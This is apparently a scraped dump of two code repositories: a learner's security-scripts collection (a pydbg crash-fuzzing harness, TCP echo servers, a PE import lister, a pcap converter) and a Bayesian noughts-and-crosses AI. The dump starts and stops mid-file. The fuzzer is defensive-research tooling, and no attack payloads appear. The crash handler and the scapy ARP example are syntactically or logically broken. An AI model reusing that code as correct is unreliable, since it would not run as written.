\" + sys.argv[0] + \" <prog> <file_to_open> <log_dir> <timeout> <info> <clsid>\"\n\tsys.exit()\n\ndef create_crash_log(pydbg):\n\tcontext = pydbg.dump_context()\n\teip = hex(pydbg.context.Eip)\n\tactual_log_dir = log_dir + \"\\\\eip_\" + eip\n\tif not os.path.exists(actual_log_dir):\n\t\tos.makedirs(actual_log_dir)\n\tlog_name = clsid + \".crash\"\n\tlog = file(actual_log_dir + \"\\\\\" + log_name, \"w\")\n\tlog.write(\"-------------------\\n\")\n\tlog.write(\" INFO\\n\")\n\tlog.write(\"-------------------\\n\")\n\tlog.write(\"\\n\\n\")\n\tlog.write(info + \"\\n\")\n\tlog.write(\"\\n\\n\")\n\tlog.write(\"-------------------\\n\")\n\tlog.write(\" CONTEXT\\n\")\n\tlog.write(\"-------------------\\n\")\n\tlog.write(\"\\n\\n\")\n\tlog.write(context)\n\tlog.close\n\tshutil.copy(file_to_open, actual_log_dir + \"\\\\\" + os.path.basename(file_to_open))\n\ndef access_violation_handler(pydbg):\n\tprint \"[+] access violation! (CRASH)\"\n\ttimer.cancel()\n\tcreate_crash_log(pydbg)\n\tpydbg.terminate_process()\n\tf = open(\"blacklist.js\",'r')\n\t\tfiledata = f.read()\n\t\tf.close()\n\t\tif 'placeholder' in filedata:\n\t\t\tnewdata = filedata.replace(\"placeholder\",clsid)\n\t\telse\n\t\t\tnewdata = filedata.replace(\")\",\"'\"+clsid+\"')\")\n\t\tf = open(\"blacklist.js\",'w')\n\t\tf.write(newdata)\n\t\tf.close()\n\treturn DBG_CONTINUE\n\ndef process_quit_handler(pydbg):\n\tprint \"[+] program quit!\"\n\ttimer.cancel()\n\treturn DBG_CONTINUE\n\ndef first_breakpoint(pydbg):\n\tif pydbg.first_breakpoint:\n\t\tpydbg.set_callback(EXCEPTION_ACCESS_VIOLATION, access_violation_handler)\n\t\tpydbg.set_callback(EXIT_PROCESS_DEBUG_EVENT, process_quit_handler)\n\n\treturn DBG_CONTINUE\n\ndef timeout_handler():\n\tprint \"[+] \" + os.path.basename(program) + \" timedout!\"\n\tdbg.terminate_process()\n\n\nprogram = sys.argv[1]\nfile_to_open = sys.argv[2]\nlog_dir = sys.argv[3]\ntimeout = float(sys.argv[4])\ninfo = sys.argv[5]\nclsid = sys.argv[6]\n\nif not os.path.exists(log_dir):\n\tos.makedirs(log_dir)\n\ndbg = pydbg()\nprint \"[+] setting initial breakpoint\"\ndbg.set_callback(EXCEPTION_BREAKPOINT, first_breakpoint)\nprint \"[+] loading & attaching to program...\"\ndbg.load(program, file_to_open)\nprint \"[+] starting timeout timer\"\ntimer = Timer(timeout, timeout_handler)\ntimer.start()\nprint \"[+] running...\"\ndbg.run()\n\nprint \"[+] Done!\"\n" }, { "alpha_fraction": 0.595588207244873, "alphanum_fraction": 0.6060924530029297, "avg_line_length": 16.629629135131836, "blob_id": "cc4843bdecf099932759000404a9ea15471553bc", "content_id": "e62dc02ac9e4162d28958242825c31cef619722d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 952, "license_type": "no_license", "max_line_length": 82, "num_lines": 54, "path": "/python/Module-1/classes.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "__author__ = 'ma11ock'\n\n\nclass Calculator:\n\n def __init__(self, ina, inb):\n self.a = ina\n self.b = inb\n\n def add(self):\n\n return self.a + self.b\n\n def multiply(self):\n\n return self.a * self.b\n\n\nclass Scientific(Calculator):\n\n def power(self):\n\n return pow(self.a, self.b)\n\ndef quick_add(a, b):\n\n return a + b\n\nnewCalculation = Calculator(10, 20)\nnewPower = Scientific(2, 3)\n\nprint('a+b: %d' % newCalculation.add())\nprint('a*b: %d' % newCalculation.multiply())\n\n# Scientific inherits from Calculator\nprint('a*b: %d' % newPower.multiply())\nprint('a+b: %d' % newPower.add())\nprint('a pow b: %d' % newPower.power())\n\n# globvar = 0\n#\n#\n# def set_globvar_to_one():\n#\n# # global globvar # Needed to modify global copy of globvar\n# globvar = 1\n#\n#\n# def print_globvar():\n#\n# print(globvar) # No need for global declaration to read value of globvar\n#\n# set_globvar_to_one()\n# print_globvar()\n" }, { "alpha_fraction": 0.7272727489471436, "alphanum_fraction": 0.7575757503509521, "avg_line_length": 21.33333396911621, "blob_id": "25b1fd1cb6cf1f6a70dff59e804b7fef49220f25", "content_id": "be4b7b28f43057c43016ffc073f8d472ff4a71fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 66, "license_type": "no_license", "max_line_length": 42, "num_lines": 3, "path": "/python/Module-1/pkgdemo/__init__.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "__author__ = 'ma11ock'\n\nfrom classes import Calculator, Scientific" }, { "alpha_fraction": 0.6404958963394165, "alphanum_fraction": 0.64462810754776, "avg_line_length": 17.615385055541992, "blob_id": "83a5cf46e4c8c3c557b1b94a2844d30450f443c8", "content_id": "f5b619c067701d47fe8ee4d67a9a870016b07625", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 242, "license_type": "no_license", "max_line_length": 38, "num_lines": 13, "path": "/python/mock/dumpmodules.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys,pefile\n\nprint \"./script path/to/file\"\n\n# not pretty just has to work!\nfile=sys.argv[1]\npe=pefile.PE(file)\n\nprint '[+] Imported DLLs [+]'\nfor dlls in pe.DIRECTORY_ENTRY_IMPORT:\n print '[+] ' , dlls.dll, ' [+]'\n" }, { "alpha_fraction": 0.5122448801994324, "alphanum_fraction": 0.5163265466690063, "avg_line_length": 20.30434799194336, "blob_id": "9a82b1de003f5839d07ff9d5324e1bc8b95dab5d", "content_id": "98f7cccd5d13ba5daba1af2449d691526e77f09d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1470, "license_type": "no_license", "max_line_length": 70, "num_lines": 69, "path": "/python/Module-2/directory.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "__author__ = 'ma11ock'\n\nimport glob\nimport os\nimport sys\n\n\n# print(os.getcwd())\n#os.mkdir(\"newdir\")\n#os.rmdir() - removes empty dir\n#os.remove() - removes file\n#shutil.rmtree() - removes dir & contents\n# print(os.listdir(\".\"))\n#\n# for item in os.listdir(\".\"):\n# if os.path.isfile(item):\n# print(item + \" is a file\")\n# elif os.path.isdir(item):\n# print(item + \" is a directory\")\n# else:\n# print(\"unknown\")\n\n\n#glob not great for large files\n# for item in glob.glob(os.path.join(\".\", \"*.py\")):\n# print(item)\n\nprint()\nprint()\n\nfor dirpath, dirs, files in os.walk(\".\"):\n path = dirpath.split('/')\n print('|', (len(path))*'---', '[', os.path.basename(dirpath), ']')\n for dir in dirs:\n directory = dir\n\n for f in files:\n cwd = path\n # print(path)\n # if dirs empty append ..if dirs = dirs append\n if path is not None:\n # need to distinguish dir from file\n if path != cwd:\n path.append(f)\n print('|', (len(path))*'---', '[', f, ']')\n\n\nprint()\nprint()\n\ntry:\n sys.argv[1]\nexcept:\n path = os.getcwd()\nelse:\n path = sys.argv[1]\n\n\ndef listdir(dir=path, depth=1):\n\n for f in glob.glob(os.path.join(dir + \"/*\")):\n if os.path.isdir(f):\n print(depth*\"----\" + \" [\" + f.split(\"/\").pop() + \"]\")\n listdir(f, depth+1)\n else:\n print(depth*\"----\" + \" [\" + f.split(\"/\").pop() + \"]\")\n\nprint(path)\nlistdir()\n" }, { "alpha_fraction": 0.5670611262321472, "alphanum_fraction": 0.5808678269386292, "avg_line_length": 27.13888931274414, "blob_id": "ff778e039ed62c3304fa334c469f592698fd711c", "content_id": "ddc9c1229aa74f3ae9b4afc442a7d23a6b609992", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1014, "license_type": "no_license", "max_line_length": 99, "num_lines": 36, "path": "/FaX/tcpserver.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n__author__ = 'ma11ock'\n\nimport SocketServer,socket,errno\n\n# EchoHandler - handle all clients connecting to server, could be fuzzer, could be data capture etc\n\nclass EchoHandler(SocketServer.BaseRequestHandler):\n\n def handle(self):\n print(\"client is: \", self.client_address)\n data = 'dummy'\n\n try:\n while len(data):\n data = self.request.recv(1024)\n print(\"client sent: \", data)\n fdesc = open(\"C:\\\\fuzzer\\\\log\\\\log.txt\",\"a\")\n fdesc.write(data)\n self.request.send(data)\n except socket.error as error:\n if error.errno == errno.WSAECONNRESET:\n print(\"i'm breaking here\")\n else:\n raise\n \n print(\"client left\")\n\n\ntry:\n\tserverAddr = (\"0.0.0.0\",9000)\n\tserver = SocketServer.TCPServer(serverAddr,EchoHandler)\n\tserver.serve_forever()\n\tprint \"[+] log server connected\"\nexcept socket.error:\n\tprint \"[+] log server is up\"\n\n" }, { "alpha_fraction": 0.6331658363342285, "alphanum_fraction": 0.6566163897514343, "avg_line_length": 25, "blob_id": "f0364940136ab1567df9b1709ac38145547fb7d5", "content_id": "0e37a5edc3d190397e18e1f12572c02c76032edd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 597, "license_type": "no_license", "max_line_length": 99, "num_lines": 23, "path": "/python/Module-3/tcpserver.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n__author__ = 'ma11ock'\n\nimport SocketServer\n\n# EchoHandler - handle all clients connecting to server, could be fuzzer, could be data capture etc\n\nclass EchoHandler(SocketServer.BaseRequestHandler):\n\n def handle(self):\n print(\"client is: \", self.client_address)\n data = 'dummy'\n\n while len(data):\n data = self.request.recv(1024)\n print(\"client sent: \", data)\n self.request.send(data)\n\n print(\"client left\")\n\nserverAddr = (\"0.0.0.0\",9000)\nserver = SocketServer.TCPServer(serverAddr,EchoHandler)\nserver.serve_forever()" }, { "alpha_fraction": 0.6274319291114807, "alphanum_fraction": 0.6410505771636963, "avg_line_length": 22.363636016845703, "blob_id": "76758f91a1ba1079f0b8de1845648cd360794666", "content_id": "3d6261f9bd5f5f0af4fce7c57fd553dde8b36e5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1028, "license_type": "no_license", "max_line_length": 85, "num_lines": 44, "path": "/ruby/pcap2json.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "require 'JSON'\nrequire 'cobravsmongoose'\nrequire 'awesome_print'\nrequire 'nokogiri'\n\nif ARGV[0] == \"-h\" || ARGV[0] == \"--help\" || ARGV[0] == nil\n puts \" | ruby pcap2json.rb INPUT OUTPUT\"\n puts \" | ruby pcap2json.rb /Users/BOB/Desktop/pcap.pcapng /Users/BOB/Desktop/json\"\n exit\nelse\n #change ARGV[1] to xml to convert to json\n `tshark -r \"#{ARGV[0]}\" -T pdml > xml`\nend\n\n# 1 method\nxml = File.open(\"xml\").read\n#json = CobraVsMongoose.xml_to_json(xml)\n#pretty_json = JSON.pretty_generate(JSON.parse json)\n#output = ap pretty_json\nFile.open(\"#{ARGV[1]}\", \"w\") { |file| file.write(xml) }\n\n\n# 2 method\n#File.foreach(\"xml\") do |xml|\n # json = CobraVsMongoose.xml_to_json(xml)\n #File.open(\"#{ARGV[1]}\",\"a\"){|file|file.write(json)}\n#end\n\n# 3 method\n#xml = []\n#File.foreach(\"xml\"){|line|xml << line}\n\n#xml = xml.join\n#json = CobraVsMongoose.xml_to_json(xml)\n#File.open(\"#{ARGV[1]}\",\"a\"){|file|file.write(json)}\n\n#`rm xml`\n\n#f = File.open(\"#{ARGV[1]}\")\n#doc = Nokogiri::XML(f)\n\n#puts doc.xpath('//proto/name/@showname')\n\n#f.close\n" }, { "alpha_fraction": 0.5855262875556946, "alphanum_fraction": 0.625, "avg_line_length": 15.777777671813965, "blob_id": "20e6654a9fd261c489615d803ced529be6249937", "content_id": "fa71d02c77b26d00dcf07a5a38f2b2bf65c2d999", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 152, "license_type": "no_license", "max_line_length": 51, "num_lines": 9, "path": "/python/Module-1/modules.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "__author__ = 'ma11ock'\n\nimport classes\n\nprint('Quick Add a+b: %d' % classes.quick_add(3,4))\n\nins = classes.Scientific(5, 6)\n\nprint('%d' % ins.power())\n\n" }, { "alpha_fraction": 0.6774193644523621, "alphanum_fraction": 0.7096773982048035, "avg_line_length": 27.714284896850586, "blob_id": "417ba2fa643b4762858c03c7d2445c07bb85630d", "content_id": "174cea1a93f7fa9b79ef7a974a32c5ed12a91c22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 403, "license_type": "no_license", "max_line_length": 58, "num_lines": 14, "path": "/python/Module-3/arprequest.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n__author__ = 'ma11ock'\n\nfrom scapy.all import Ether,IP,TCP,sr1\n\n# just showing a send receive layer 3 scapy request\npkt = sr(IP(dst=\"127.0.0.1\")/ARP()/\"XXX\")\n# pkt = (response, unanswered)\n# breaks up our pkt into a response and unanswered section\nresponse, no_response = _\n# gives our full results\nresponse[0]\n# this gives us our results with the IP packet\nresponse[0][1].show()\n\n" } ]
47
nikolaimerritt/NoughtsAndCrossesML
https://github.com/nikolaimerritt/NoughtsAndCrossesML
067bfaaf9effba56038be7e3a27b3be367d95bc2
2a5fd89753badecc8602a69b9095980d256c14bb
d0da94099e045a75c0954730afdd60132fbdc34d
refs/heads/master
2022-11-16T12:46:50.430534
2020-06-23T10:59:06
2020-06-23T10:59:06
272,956,153
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5451072454452515, "alphanum_fraction": 0.5595062971115112, "avg_line_length": 30.229358673095703, "blob_id": "1ece231a8ea852d0eab42edd91de9b5d2123b826", "content_id": "228049dafd945bfad7866beca3cfbf949ad030a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3403, "license_type": "no_license", "max_line_length": 143, "num_lines": 109, "path": "/host.py", "repo_name": "nikolaimerritt/NoughtsAndCrossesML", "src_encoding": "UTF-8", "text": "import random, time, os\nfrom mathsyStuff import cellNumberToCoord, elSuchThat\nfrom board import Board, cellNumberToCoord\nfrom ai import Learner\n\nai = Learner()\n\nclass Player:\n ai = 0\n human = 1\n random = 2\n def __init__(self, nature, name, id):\n self.nature = nature \n self.name = name \n self.id = id\n \n def __str__(self):\n natureString = \"(Human)\" if self.nature == Player.human else \"(AI)\"\n return self.name + \" (\" + Board.idToSymbol[self.id] + \") \" + natureString\n\ndef moveChoice(player, board, verbose):\n if player.nature == Player.ai:\n if verbose:\n os.system(\"clear\")\n print(\"\\n\\n\\n\")\n board.print()\n print(str(player), \"is thinking...\")\n time.sleep(1)\n ai.printUncertainties(board, player.id)\n time.sleep(3.5)\n print(\"\\n\\n\")\n return ai.choosePosition(board, player.id)\n elif player.nature == Player.random:\n return random.choice(board.availableCells())\n elif player.nature == Player.human:\n board.print()\n coord = None\n while coord == None or coord not in board.availableCoords():\n cellNumber = int(input(\"\\n{0} Where would you like to move?\\t\".format(player))) - 1\n coord = cellNumberToCoord(cellNumber)\n return coord\n\ndef winners(player1, player2, verbose = False):\n \"\"\"\n player1 plays first. assume player1.id == 1, player2.id == 2\n \"\"\"\n board = Board()\n while True:\n for player in [player1, player2]:\n board.makeMove(moveChoice(player, board, verbose), player.id)\n if board.isWinningBoard():\n if verbose:\n board.print()\n return [player.id]\n elif board.isFull():\n if verbose:\n board.print()\n return [1, 2]\n\ndef playAIvsAI():\n player1 = Player(Player.ai, \"Nick\", 1)\n player2 = Player(Player.ai, \"James\", 2)\n winners(player1, player2)\n\n gamesPlayed = 0\n while ai.amountOfData < ai.whenToStop:\n ai.learnAfterGame(winners(player1, player2))\n gamesPlayed += 1\n if (gamesPlayed + 1) % Learner.saveInterval == 0:\n ai.writeData()\n \ndef playAIvsPlayer(verbose = True):\n ai.whenToPlaySmart = 0\n if verbose:\n os.system(\"clear\")\n print(\"\\n\\n\\nPositions are numbered 1 to 9, starting at the top left and going across. \\nE.g. if you wanted to go to the (x) position\")\n Board([\n [0, 0, 0],\n [1, 0, 0],\n [0, 0, 0]\n ]).print()\n print(\"you'd type in 4 when asked.\\n\\n\")\n time.sleep(5)\n\n humanPlayer = Player(\n Player.human, \n input(\"What would you like to be called?\\t\"), \n 1 if \"y\" in input(\"Would you like to go first?\\t\").lower() else 2\n )\n\n if verbose:\n os.system(\"clear\")\n print(\"\\n\\n\\n\")\n\n aiPlayer = Player(Player.ai, \"Bayes\", 3 - humanPlayer.id)\n players = [humanPlayer, aiPlayer]\n players.sort(key = lambda p: p.id)\n\n wins = winners(*players, verbose)\n if verbose:\n if len(wins) == 2:\n print(\"It's a tie :/\")\n else:\n winner = elSuchThat(players, lambda p: p.id in wins)\n print(str(winner), \"has won!\")\n\nplayAIvsPlayer()\nwhile \"n\" not in input(\"Go again? \\t\").lower():\n playAIvsPlayer()" }, { "alpha_fraction": 0.6679462790489197, "alphanum_fraction": 0.6967370510101318, "avg_line_length": 44.34782791137695, "blob_id": "575b4f179bfdf691be280c8194cc69b5f101c5d0", "content_id": "7c1396b5bc8fbdae1db07ecc58ba6b77d8067a45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1042, "license_type": "no_license", "max_line_length": 107, "num_lines": 23, "path": "/standardiser.py", "repo_name": "nikolaimerritt/NoughtsAndCrossesML", "src_encoding": "UTF-8", "text": "from mathsyStuff import Transformation\nfrom board import Board\n\n\"\"\"\n - a position on the board is modelled by a row vector, with the origin at the board's centre\n - there are 16 transformations on a board which preserve the boards layout (rotations, reflections, etc),\n since there are 8 different ways an arrow (--->) along the board's top edge can end up,\n and each can be composed with a swap of the players' symbols\n - these form a group\n - rotations by 0, 90, 180 and 270, a reflection by 45, the identity, and a piece swap,\n belong to this group, so their compositions (which are 16 elements) \n make up the group\n\"\"\"\ndef standardTransformation(board, playerID):\n swap = playerID != 1\n minTrans = Transformation.identity()\n\n for angle in [0, 90, 180, 270]:\n for reflectBy45 in [True, False]:\n trans = Transformation.fromProperties(angle, reflectBy45, swap)\n if trans.onBoard(board).encoding() < minTrans.onBoard(board).encoding():\n minTrans = trans\n return minTrans" }, { "alpha_fraction": 0.8160919547080994, "alphanum_fraction": 0.8160919547080994, "avg_line_length": 42.5, "blob_id": "45a0b174a18d27017b20f517c96f56b519cec98f", "content_id": "982fe6ba325de71b5c5a872f02e453d4b5cea8a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 87, "license_type": "no_license", "max_line_length": 64, "num_lines": 2, "path": "/README.md", "repo_name": "nikolaimerritt/NoughtsAndCrossesML", "src_encoding": "UTF-8", "text": "# NoughtsAndCrossesML\nVery basic noughts and crosses (tic-tac-toe) machine learning AI\n" }, { "alpha_fraction": 0.4885479211807251, "alphanum_fraction": 0.5094507336616516, "avg_line_length": 26.5950927734375, "blob_id": "de2991fbac032a28343427ee077b1227d048c40a", "content_id": "2401037fc17a98a0e78aadb7a08d727dd46218b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4497, "license_type": "no_license", "max_line_length": 116, "num_lines": 163, "path": "/mathsyStuff.py", "repo_name": "nikolaimerritt/NoughtsAndCrossesML", "src_encoding": "UTF-8", "text": "from board import *\n\nclass SquareMatrix:\n @classmethod\n def identity(cls, dimemsion = 2):\n \"\"\"\n only bothering for 2x2 case\n \"\"\"\n return cls([\n [1, 0],\n [0, 1]\n ])\n\n @classmethod\n def dot(cls, vect1, vect2):\n return sum([vect1[i] * vect2[i] for i in range(len(vect1))])\n\n def __init__(self, rows):\n self.rows = rows\n self.dim = len(self.rows)\n \n def __str__(self):\n string = \"\"\n for row in self.rows:\n for x in row:\n string += str(x) + \"\\t\"\n string += \"\\n\"\n return string\n \n def row(self, r):\n return self.rows[r]\n \n def col(self, c):\n return [self.rows[r][c] for r in range(self.dim)]\n \n def __rmul__(self, scalar):\n return SquareMatrix([\n [scalar * self.rows[r][c] for c in range(self.dim)]\n for r in range(self.dim)\n ])\n \n def __matmul__(self, other):\n if type(other) == SquareMatrix:\n return self.actOnMatrix(other)\n else:\n return self.actOnVector(other)\n \n def actOnVector(self, vector):\n return [SquareMatrix.dot(self.row(r), vector) for r in range(self.dim)]\n \n def transpose(self):\n return SquareMatrix([\n [self.rows[c][r] for c in range(self.dim)] \n for r in range(self.dim)\n ])\n\n def actOnMatrix(self, matrix):\n return SquareMatrix([\n self.actOnVector(matrix.col(c)) for c in range(matrix.dim)\n ]).transpose()\n \n def det(self):\n \"\"\"\n case of 2x2 matrix\n \"\"\"\n return self.rows[0][0] * self.rows[1][1] - self.rows[0][1] * self.rows[1][0]\n\n def inverse(self):\n \"\"\"\n case of 2x2 matrix\n \"\"\"\n if self.det() == 0:\n raise ValueError(\"Trying to find the inverse of {0}, which does not exist\".format(str(self)))\n return 1 / 0\n else:\n invDet = 1 / self.det()\n if 1 / self.det() == int(1/self.det()):\n invDet = int(invDet)\n \n return invDet * SquareMatrix([\n [self.rows[1][1], -self.rows[0][1]],\n [-self.rows[1][0], self.rows[0][0]]\n ])\n\nclass Transformation:\n @classmethod\n def integerSin(cls, multOf90):\n \"\"\"\n returns only 0, 1, 0, -1, ...\n \"\"\"\n k = int(multOf90 / 90)\n return 0 if k % 2 == 0 else (-1) ** int((k - 1) / 2)\n\n @classmethod\n def integerCos(cls, multOf90):\n \"\"\"\n returns only 1, 0, -1, 0, ...\n \"\"\"\n k = int(multOf90 / 90)\n return 0 if k % 2 != 0 else (-1) ** int(k / 2)\n\n reflect45 = SquareMatrix([\n [0, 1],\n [1, 0]\n ])\n \n @classmethod\n def rotationMatrix(cls, angle):\n c = cls.integerCos(angle)\n s = cls.integerSin(angle)\n return SquareMatrix([\n [c, -s], \n [s, c]\n ])\n \n @classmethod\n def swapPlayerIdx(cls, num):\n if num == 2:\n return 1\n if num == 1:\n return 2\n return num\n \n @classmethod\n def identity(cls):\n return cls.fromProperties(0, False, False)\n \n @classmethod\n def fromProperties(cls, rotationAngle, reflect, swap):\n matrix = cls.reflect45 @ cls.rotationMatrix(rotationAngle) if reflect else cls.rotationMatrix(rotationAngle)\n return cls(matrix, swap)\n\n def __init__(self, matrix, swap):\n self.matrix = matrix\n self.swap = swap\n \n def onCoord(self, coord):\n \"\"\"\n Note that this has no way to swap pieces\n \"\"\"\n return self.matrix @ coord\n\n def onBoard(self, board):\n newBoard = Board()\n for y in [1, 0, -1]:\n for x in [-1, 0, 1]:\n pieceAtxy = board.atCoord((x, y))\n imgCoord = self.onCoord((x, y))\n if pieceAtxy != 0:\n newBoard.makeMove(imgCoord, pieceAtxy)\n return newBoard\n \n def inverse(self):\n return Transformation(self.matrix.inverse(), self.swap)\n\ndef pad(num, digits):\n numAsString = str(float(num))\n amountOfZeroes = max(digits - len(numAsString.replace(\".\", \"\")), 0)\n return numAsString[0 : digits] + \"0\" * amountOfZeroes\n\ndef elSuchThat(list, condition):\n elsThatMatchCondition = [x for x in list if condition(x)]\n return elsThatMatchCondition[0] if elsThatMatchCondition else None" }, { "alpha_fraction": 0.5446159839630127, "alphanum_fraction": 0.553463876247406, "avg_line_length": 32.41509246826172, "blob_id": "297e7c853e8ce4f412b8f172c04f7984cbe14563", "content_id": "21b175f0915e16f79306a7d3ec2e4cd0bd3a40de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5312, "license_type": "no_license", "max_line_length": 109, "num_lines": 159, "path": "/ai.py", "repo_name": "nikolaimerritt/NoughtsAndCrossesML", "src_encoding": "UTF-8", "text": "from util import before, after, between\nimport random, math\nfrom mathsyStuff import pad, elSuchThat\nfrom standardiser import standardTransformation\n\n\nclass Choice:\n def __init__(self, encodingBeforeMove, priorChosen, playerID):\n self.encoding = encodingBeforeMove\n self.prior = priorChosen\n self.playerID = playerID\n \n def __str__(self):\n return \"{0} ({1}): {2}\".format(self.encoding, self.playerID, str(self.prior))\n \nclass Prior:\n def __init__(self, alpha, beta, coord):\n self.alpha = alpha\n self.beta = beta\n self.coord = coord\n \n @classmethod\n def fromString(cls, string):\n alpha, beta = [float(x) for x in before(string, \" (\").split(\", \")]\n coord = [int(x) for x in between(string, \" (\", \")\").split(\", \")]\n \n return cls(alpha, beta, coord)\n\n def __str__(self):\n return \"{0}, {1} ({2}, {3})\".format(\n self.alpha,\n self.beta,\n self.coord[0],\n self.coord[1]\n )\n \n def mean(self):\n return self.alpha / (self.alpha + self.beta)\n \n def update(self, datum):\n return Prior(self.alpha + datum, self.beta + 1 - datum, self.coord)\n\n def __eq__(self, other):\n if type(other) != Prior:\n return False\n return self.alpha == other.alpha and self.beta == other.beta and self.coord == other.coord\n\nclass Learner:\n possibleStdBoards = int((3 ** 9) / 8)\n whenToPlaySmart = 20 * possibleStdBoards\n whenToStop = 60 * possibleStdBoards\n saveInterval = 100\n priorsFile = \"priors.txt\"\n\n def __init__(self):\n self.encodingToPriors = self.readPriors()\n self.amountOfData = self.readAmountOfData()\n self.movesMade = []\n\n def readAmountOfData(self):\n \"\"\"\n amount of data is in first line\n \"\"\"\n with open(Learner.priorsFile, \"r\") as f:\n return int(f.readline())\n\n def readPriors(self):\n \"\"\"\n first line is amount of data, so is ignored\n\n lines are of format\n 13072: <prior>; <prior>; <prior>\n \"\"\"\n encodingToPriors = {}\n with open(Learner.priorsFile, \"r\") as f:\n for line in f.readlines()[1 : ]:\n encoding = int(before(line, \": \"))\n priorsBit = after(line, \": \")\n encodingToPriors[encoding] = [Prior.fromString(bit) for bit in priorsBit.split(\"; \")]\n return encodingToPriors\n \n def priorsToString(self):\n string = \"\"\n for encoding, priors in self.encodingToPriors.items():\n string += str(encoding) + \": \"\n \n for i in range(len(priors)):\n string += str(priors[i])\n if i + 1 < len(priors):\n string += \"; \"\n string += \"\\n\"\n\n return string \n \n def writeData(self):\n with open(Learner.priorsFile, \"w\") as f:\n f.write(str(self.amountOfData) + \"\\n\")\n f.write(self.priorsToString())\n\n def choosePosition(self, board, playerID):\n \"\"\"\n board \n |--(matrix)--> stdBoard \n |--(choose best prior)--> stdPos\n |--(matrix^-1)--> pos \n \"\"\"\n\n transToStd = standardTransformation(board, playerID)\n stdBoard = transToStd.onBoard(board)\n prior = self.choosePrior(stdBoard)\n self.movesMade.append(Choice(stdBoard.encoding(), prior, playerID))\n pos = transToStd.inverse().onCoord(prior.coord)\n return pos\n \n def choosePrior(self, stdBoard):\n encoding = stdBoard.encoding()\n\n if encoding not in self.encodingToPriors.keys():\n self.setUnbiasedPriors(stdBoard)\n\n if self.amountOfData < self.whenToPlaySmart:\n return random.choice(self.encodingToPriors[encoding])\n else:\n return self.bestPrior(self.encodingToPriors[encoding]) \n \n def setUnbiasedPriors(self, board):\n priors = [Prior(0.5, 0.5, coord) for coord in board.availableCoords()]\n self.encodingToPriors[board.encoding()] = priors\n\n def bestPrior(self, priors):\n bestPrior = priors[0]\n for prior in priors[1 : ]:\n if prior.mean() > bestPrior.mean():\n bestPrior = prior\n return bestPrior\n\n def learnAfterGame(self, winners):\n for choice in self.movesMade:\n datum = 1 if choice.playerID in winners else 0\n\n priors = self.encodingToPriors[choice.encoding]\n idx = priors.index(choice.prior)\n\n self.encodingToPriors[choice.encoding][idx] = priors[idx].update(datum)\n self.amountOfData += 1\n self.movesMade = []\n \n def printUncertainties(self, board, playerID):\n transToStd = standardTransformation(board, playerID)\n stdBoard = transToStd.onBoard(board)\n for y in [1, 0, -1]:\n for x in [-1, 0, 1]:\n stdCoord = transToStd.onCoord((x, y))\n prior = elSuchThat(self.encodingToPriors[stdBoard.encoding()], lambda p: p.coord == stdCoord)\n if prior == None:\n print(\"___\", end = \" \")\n else:\n print(pad(100 * prior.mean(), 2) + \"%\", end = \" \")\n print()" }, { "alpha_fraction": 0.44104626774787903, "alphanum_fraction": 0.4659959673881531, "avg_line_length": 26.021739959716797, "blob_id": "c4961a0ca41fda0a0ea067128c4bb176d1b09ca9", "content_id": "b7e92f64ff72c8de83ff6a07c16ca6581fa6ae5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2485, "license_type": "no_license", "max_line_length": 94, "num_lines": 92, "path": "/board.py", "repo_name": "nikolaimerritt/NoughtsAndCrossesML", "src_encoding": "UTF-8", "text": "def coordToRowCol(coord):\n \"\"\"\n centre of grid is origin\n \"\"\"\n row = 1 - coord[1]\n col = 1 + coord[0]\n return row, col\n \ndef rowColToCoord(row, col):\n \"\"\"\n centre of grid is origin\n \"\"\"\n x = col - 1\n y = 1 - row\n return (x, y)\n\ndef cellNumberToCoord(n):\n \"\"\"\n returns a number 0, ..., 8 to a coord on a 3x3 board\n \"\"\"\n return rowColToCoord(int(n / 3), n - 3 * int(n / 3))\n\n\ndef emptyGrid():\n return [\n [0, 0, 0],\n [0, 0, 0],\n [0, 0, 0]\n ]\n\nclass Board:\n idToSymbol = {\n 0: \" \",\n 1: \"x\",\n 2: \"o\"\n }\n\n def __init__(self, grid = None):\n self.grid = grid if grid else emptyGrid()\n \n def print(self):\n for r in range(3):\n for c in range(3):\n print(\"|\" + Board.idToSymbol[self.grid[r][c]], end = \"\")\n print(\"|\")\n \n def atCoord(self, coord):\n r, c = coordToRowCol(coord)\n return self.grid[r][c]\n\n def availableCoords(self):\n coords = []\n for r in range(3):\n for c in range(3):\n if self.grid[r][c] == 0:\n coords.append(rowColToCoord(r, c))\n return coords\n\n def isFull(self):\n return self.availableCoords() == []\n\n def isWinningBoard(self):\n # horizontal / vertical win\n for 